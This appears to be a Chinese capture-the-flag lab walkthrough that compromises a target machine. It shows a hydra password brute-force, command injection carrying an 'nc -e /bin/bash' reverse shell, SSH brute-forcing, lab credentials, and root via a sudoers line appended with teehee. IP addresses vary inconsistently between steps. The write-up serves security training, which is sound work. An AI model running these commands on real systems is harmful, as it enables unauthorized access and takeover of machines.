扫描IP

端口扫描

目录扫描

访问80端口，发现一个登录界面

爆破密码

hydra -l admin -P rockyou.txt 192.168.254.153 http-post-form "/login.php:username=^USER^&password=^PASS^:S=logout" -F-l admin：指定用户名为 admin。
-P rockyou.txt：指定密码字典为当前目录下的 rockyou.txt。
192.168.1.165：指定要攻击的服务器 IP 地址。
http-post-form：指定使用 HTTP POST 请求方式。
"/login.php:username=^USER^&password=^PASS^:S=logout"：指定登录页面地址 /login.php，并使用 username 和 password 作为参数名来传递用户名和密码。其中 ^USER^ 和 ^PASS^ 含义为在暴力破解过程之中将要用到的用户名和密码，而 :S=logout 则是指当程序返回值为 logout 时，认为破解成功并退出程序。
-F：如果成功的话，停止猜测其他密码。

登录

getshell：

bp抓包，是命令执行

查看/etc/passwd

反弹shell

radio=nc+-e/bin/bash+192.168.111.147+6768&submit=Run
nc -lvnp 6768

提权

使用 python3 提升交互性

python3 -c 'import pty;pty.spawn("/bin/bash")'

sudo -l,不知道密码

jim目录下有密码字典，并将字典下载下来，使用hydra进行破解

hydra -L Username.txt -P old-passwords.bak ssh://192.168.254.153 
jim
jibril04

ssh连接jim

ssh jim@192.168.111.150

说是有一封信，在/var/mail

有charles密码 ^xHhA&hvim0y，切换到charles

sudo -l ,teehee是个小众的linux编辑器。如果有sudo权限。可以利用其来提权

echo 'charles ALL=(ALL:ALL) NOPASSWD:ALL' | sudo teehee -a /etc/sudoers
sudo su